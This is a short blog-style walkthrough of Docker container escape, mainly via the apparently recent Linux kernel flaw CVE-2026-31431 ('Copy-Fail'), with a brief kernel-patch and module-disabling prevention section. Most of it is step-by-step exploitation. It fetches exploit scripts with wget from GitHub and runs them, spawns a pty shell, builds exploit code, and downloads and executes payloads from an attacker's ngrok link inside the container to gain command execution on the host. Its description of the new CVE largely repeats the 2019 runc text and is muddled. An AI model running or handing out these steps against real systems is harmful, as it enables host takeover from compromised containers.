Escaping Docker Container in 2026

Description

In 2026, Most real-world escape paths are no longer “simple tricks,” but instead depend on either rare kernel-level vulnerability in the shared host kernel, serious misconfigurations (like privileged containers or exposed Docker sockets), or complex chains that exploit subtle gaps between isolation layers. Additionally, widespread adoption of rootless containers, hardened seccomp profiles, and minimal base images has significantly reduced the attack surface, meaning attackers must often combine multiple weaknesses rather than rely on a single flaw, making reliable container escape in modern environments difficult, noisy, and heavily environment-dependent.

Methodology

CVE’s

CVE-2019-5736

During docker exec, runc opens “/proc/self/exe” (which points to the runc binary on the host) via a symlink in the container filesystem. By controlling when and how this symlink resolves, the container can write to the host runc binary while it is being executed.

‍

CVE-2026-31431 (Docker Escape)

During docker exec, runc opens “/proc/self/exe” (which points to the runc binary on the host) via a symlink in the container filesystem. As there is a global page cache by corrupting the memory page cache an attacker can write to the host runc binary while it is being executed.

Exploitation

1. Start with low-privilege user access within a container environment.
‍

2. Download the Copy-Fail exploit, grant it executable permissions, and run it by using following commands.

wget https://raw.githubusercontent.com/seanrickerd/cve-2026-31431/main/exploit.py
chmod +x exploit.py
python3 exploit.py
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Observed successful privilege escalation.
‍

‍

4. Execute the following commands on the attacker system (ensure payload.c is appropriately modified before compilation).

git clone https://github.com/hans362/CVE-2026-31431-Copy-Fail-Container-Escape.git
cd CVE-2026-31431-Copy-Fail-Container-Escape
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
ls -la

‍

5. Run the following commands inside the Docker container.

cd tmp
wget <ngrok-link>/exp.sh
wget <ngrok-link>/exploit
chmod +x exp.sh exploit
./exp.sh

‍

6. Optional: From the host, run docker exec <your_container> /bin/true, simulating an automated CI/CD-style task execution.
‍

‍

7. Observed successful command execution on the host system.

Prevention

Update your distribution's kernel package to one that includes mainline commit ”a664bf3d603d” it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.

Commands:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

[cta]

References

• https://github.com/hans362/CVE-2026-31431-Copy-Fail-Container-Escape

• https://github.com/SeanRickerd/cve-2026-31431

• https://github.com/AliHzSec/CVE-2026-31431

• https://github.com/shadowabi/CVE-2026-31431-CopyFail-Universal-LPE

• https://copy.fail/#exploit

‍